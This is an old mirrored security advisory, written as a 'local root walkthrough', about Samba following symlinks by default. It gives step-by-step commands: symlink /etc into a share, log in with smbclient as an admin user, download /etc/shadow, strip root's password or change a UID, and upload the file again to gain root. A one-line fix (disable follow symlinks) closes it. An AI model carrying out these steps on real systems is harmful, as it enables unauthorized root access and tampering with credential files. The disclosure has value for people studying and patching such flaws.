[ SOURCE: http://www.secureroot.com/security/advisories/9768336198.html ] Symlink attack in (all?) Samba. - Local root walkthrough by Tozz ================================================================= Requirements: * Shell access or any other way to create symlinks * A running samba deamon * The username and/or password of a user named in the admin lists in one or more shares. * Brains are not required. By default, Samba (http://www.samba.org) followes symlinks, which can lead to root promises. Here is an example: I have a guy that sorts out all my uploads through SMB, he has 'admin' access (admin users = username).. This means he will work as UID 0 (root). e.g. we have this share in /etc/smb.conf [uploads] path = /home/ftp/incoming comment = Uploads that came through anon ftp guest ok = no writeable = no force create mode = 0755 force directory mode = 0755 admin users = warezmaster Login to the shell, or find some other way to create symlinks and create a symlink in /home/ftp/incoming you do something like ln /etc -s now type on you're box (local or remote works both): smbclient file://foobar.com/uploads -U warezmaster it will ask for a password, enter it and you will get something like smb\:> There we go smb\:>cd etc smb\:>get shadow smb\:>exit [root@embrace /root] now you downloaded the shadow file on you're localbox edit it, change you're UID to 0, or remove the password from the root account (no password required at logon) login with smbclient again smbclient file://foobar.com/uploads -U warezmaster enter the password and reupload smb\:>cd etc smb\:>put shadow smb\:>exit that's it, now login to the shell, if you changed you're own uid you are now root. If you removed the password from root account just su to it and you wont need a password. Note: The 'Follow Symlinks' can be turned off, but it's on by default. Fix: Disable Follow Symlinks Bye, Tozz (tozz@hackers4hackers.org) You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz or MemoServ me when I'm not online.